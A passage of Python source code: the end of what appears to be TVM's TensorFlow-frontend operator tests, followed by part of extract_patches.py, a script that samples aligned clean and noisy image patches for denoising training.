output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
"""One iteration of dilation2d with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
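        # Scatter inf into a random half of the elements, then nan into another independently chosen half (selections may overlap).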
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.infty
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
# This test case is to test that TVM rejects any TF stateful operations
# (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
# (as these two operators can still be used as container graphs to execute
# "stateless" operations internally.
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynamic_rnn_lstmblockcell():
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
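    # init_state packs a (cell, hidden) pair per layer: shape (num_layers, 2, batch_size, state_size).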
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(None, "", ["Unique:0", "Unique:1"])
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
None, "", ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"]
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
#######################################################################
# check graph ir for nn.moments
# ------------
def test_moments():
g = tf.Graph()
shape = [4, 176, 8, 8]
dtype = "float32"
with g.as_default():
A = tf.placeholder(shape=shape, dtype=dtype, name="A")
B = tf.placeholder(shape=shape, dtype=dtype, name="B")
mean, variance = tf.nn.moments(A, [1], keep_dims=True)
normalised_input = (A - mean) / tf.sqrt(variance + 0.0005)
mod, _ = from_tensorflow(g.as_graph_def(add_shapes=True))
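    # Expected Relay IR text for the moments-based normalization; compared structurally against the imported module below.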
program = """
def @main(%A: Tensor[(4, 176, 8, 8), float32]) {
%527 = mean(%A, axis=[1], keepdims=True) /* moments/mean */;
%528 = subtract(%A, %527) /* sub */;
%529 = subtract(%A, %527);
%530 = multiply(%529, %529) /* moments/SquaredDifference */;
%531 = mean(%530, axis=[1], keepdims=True) /* moments/variance */;
%532 = add(%531, 0.0005f) /* add */;
%533 = sqrt(%532) /* Sqrt */;
divide(%528, %533) /* truediv */
}
"""
mod_golden = tvm.parser.parse('#[version = "0.0.5"]\n' + program)
tvm.ir.assert_structural_equal(mod["main"].body, mod_golden["main"].body, map_free_vars=True)
if __name__ == "__main__":
pytest.main([__file__])
|
extract_patches.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Imports
import numpy as np
from PIL import Image
from sklearn.feature_extraction import image
from tqdm import tqdm
import argparse
import os
import threading
def sample_patches_2d(img, shape, num_patches, offset_x = 0, offset_y = 0, random_seed = 0):
"""Overriding sklearn.feature_extraction.image.extract_patches_2d
Extract patches from a mono/tri chromatic image at random, or at a given location.
Input:
img: image, either tri-chromatic (:,:,3), or mono-chromatic (:,:,1)
shape: shape that needs to be extracted into, tuple of two ints (x, y)
num_patches: number of patches to extract
offset_x: make offset on x axis
offset_y: make offset on y axis
random_seed: seed to extract the image into
Output:
patches: an array of patches of shape (num_patches, shape, 3) or (num_patches, shape, 1)
"""
assert len(img.shape) == 2 or img.shape[2] == 3, "Image dimension mismatch, should be mono or tri chromatic, %s" % str(image.shape)
# Patch height and width
sh, sw = shape
assert type(sh) is int and type(sw) is int, "Error parsing shape"
# Image height and width
ih, iw = img.shape[0], img.shape[1]
# Effective height and width to sample at
eh = ih - sh
ew = iw - sw
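    # Candidate top-left corners lie on an even-pixel (stride-2) grid, shifted by the requested offsets (used to keep the mosaic pattern aligned).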
hl = np.arange(eh)[0::2].astype(int)
wl = np.arange(ew)[0::2].astype(int)
hl += offset_y
wl += offset_x
np.random.seed(random_seed)
x = np.random.choice(wl, num_patches)
y = np.random.choice(hl, num_patches)
ats = list(zip(x, y))
patches = []
for at in ats:
patches.append(extract_single_patch_2d_at(img, shape, at))
patches = np.array(patches)
return patches
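# Illustrative usage sketch (file name "frame.tiff" is assumed, not part of this script):
#   img = np.array(Image.open("frame.tiff"))
#   patches = sample_patches_2d(img, (128, 128), 5, offset_x=0, offset_y=0, random_seed=42)
#   # patches.shape -> (5, 128, 128, 3) for an RGB input, (5, 128, 128) for a mono input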
def extract_single_patch_2d_at(img, shape, at):
"""Extract an image patch from certain location of the given image.
Input:
img: image, either tri-chromatic(:,:,3) or mono-chromatic(:,:,1)
shape: shape that needs to be extract into, tuple of two ints (h, w)
at: Upper left corner of the patch at image coordinate, tuple of two ints (x, y).
Output:
patch: of shape (shape, 3) or (shape, 1)
"""
assert len(img.shape) == 2 or img.shape[2] == 3, "Image dimension mismatch, should be mono or tri chromatic, %s" % str(image.shape)
h, w = shape
x, y = at
assert type(h) is int and type(w) is int, "Error parsing shape"
assert type(x) is np.int64 and type(y) is np.int64, "Error parsing at %s %s" % (type(x), type(y))
assert x < img.shape[1] - w, "Exceeds image size x:%d, img.w-w:%d" % (x, img.shape[1] -w)
assert y < img.shape[0] - h, "Exceeds image size y:%d, img.h-h:%d" % (y, img.shape[0] -h)
if len(img.shape) == 2:
patch = img[y:y+h, x:x+w]
else:
patch = img[y:y+h, x:x+w, :]
return patch
def extract_patches_multi(Noisy_List, Clean_List, Noisy_out = './Images/NoisyPatches/', Clean_out = './Images/CleanPatches/',
patches_per_image = 10, patch_shape = (128 ,128), offset_x = 0, offset_y = 0):
"""Extract Images into patches (Multi-threaded ver.)
Input:
Noisy_List, Clean_List: A list of filenames for noisy and clean images
Noisy_out, Clean_out: Output directory for noisy and clean patches
File Output:
Patches of file written to Noisy_out and Clean_out
Return:
None
"""
assert len(Noisy_List) == len(Clean_List), "Sanity Check: Noisy, Clean images list length mismatch"
existing_patches_n = get_file_list(Noisy_out)
existing_patches_c = get_file_list(Clean_out)
    if len(existing_patches_c) != len(existing_patches_n):
        raise IOError("Existing clean and noisy patch counts differ in the output folders; indices may be out of sync with their references.")
count_base = len(existing_patches_c)
print ("Output Folder Index Starting from %d" % count_base)
"""Function onto worker thread:
Input:
Noisy, Clean: Path for Clean Images
local_c: local variable in place of count
local_i: local variable in place of i
Assumption:
count_base, Noisy_out, Clean_out, patches_per_image, patch_shape does not
change through out the extraction.
"""
def _extract(Noisy, Clean, local_i, random_seed):
clean_img = np.array(Image.open(Clean))
noisy_img = np.array(Image.open(Noisy))
try:
if not (clean_img.shape[0] == noisy_img.shape[0] and clean_img.shape[1] == noisy_img.shape[1]):
raise ValueError("Clean(%s) and Noisy(%s) image size mismatch" % (Clean_List[i], Noisy_List[i]))
except ValueError as e:
print (e)
return
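        # The same seed is used for both images so clean and noisy patches are sampled at identical locations.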
patches_c = sample_patches_2d(clean_img, patch_shape, patches_per_image, offset_x, offset_y, random_seed)
patches_n = sample_patches_2d(noisy_img, patch_shape, patches_per_image, offset_x, offset_y, random_seed)
try:
            if not (patches_c.shape[0] == patches_per_image and patches_n.shape[0] == patches_per_image):
                raise ValueError("Extracted Patches number mismatch: clean(%s), noisy(%s), patches_per_image(%s)" % (str(patches_c.shape[0]), str(patches_n.shape[0]), str(patches_per_image)))
except ValueError:
return
for n in range(patches_c.shape[0]):
name_c = "c" + str(count_base + local_i + n).zfill(7) + ".tiff"
name_n = "n" + str(count_base + local_i + n).zfill(7) + ".tiff"
Image.fromarray(patches_c[n]).save(Clean_out + name_c)
Image.fromarray(patches_n[n]).save(Noisy_out + name_n)
random_state = np.random.randint(0, 10000, 1)
max_thread = 28
with tqdm(total = len(Noisy_List), desc = "Extracting Patches", unit = 'frames') as pbar:
for i in range(len(Noisy_List)):
# Block for too many threads created, no racing condition here.
while (threading.active_count() > max_thread):
pass
random_state += 1
            threading.Thread(target = _extract, args = (Noisy_List[i], Clean_List[i], i * patches_per_image, int(random_state[0]))).start()
pbar.update(1)
# Hold till all threads finishes.
while(threading.active_count() > 1):
pass
pbar.close()
def extract_patches(Noisy_List, Clean_List, Noisy_out = './Images/NoisyPatches/', Clean_out = './Images/CleanPatches/',
patches_per_image = 50, patch_shape = (128 ,128), offset_x = 0, offset_y = 0):
"""Extract Images into patches
Input:
Noisy_List, Clean_List: A list of filenames for noisy and clean images
Noisy_out, Clean_out: Output directory for noisy and clean patches
File Output:
Patches of file written to Noisy_out and Clean_out
Return:
None
"""
assert len(Noisy_List) == len(Clean_List), "Sanity Check: Noisy, Clean images list length mismatch"
existing_patches_n = get_file_list(Noisy_out)
existing_patches_c = get_file_list(Clean_out)
    if len(existing_patches_c) != len(existing_patches_n):
        raise IOError("Existing clean and noisy patch counts differ in the output folders; indices may be out of sync with their references.")
count = len(existing_patches_c)
print ("Output Folder Index Starting from %d" % count)
random_state = np.random.randint(0, 10000, 1)
with tqdm(total = len(Noisy_List), desc = "Extracting Patches", unit = 'frames') as pbar:
for i in range(len(Noisy_List)):
clean_img = np.array(Image.open(Clean_List[i]))
noisy_img = np.array(Image.open(Noisy_List[i]))
try:
if not (clean_img.shape[0] == noisy_img.shape[0] and clean_img.shape[1] == noisy_img.shape[1]):
raise ValueError("Clean(%s) and Noisy(%s) image size mismatch" % (Clean_List[i], Noisy_List[i]))
except ValueError as e:
print (e)
continue
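            # Reusing the same random_state for both images keeps clean/noisy patch locations aligned.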
patches_c = sample_patches_2d(clean_img, patch_shape, patches_per_image, offset_x, offset_y, random_state)
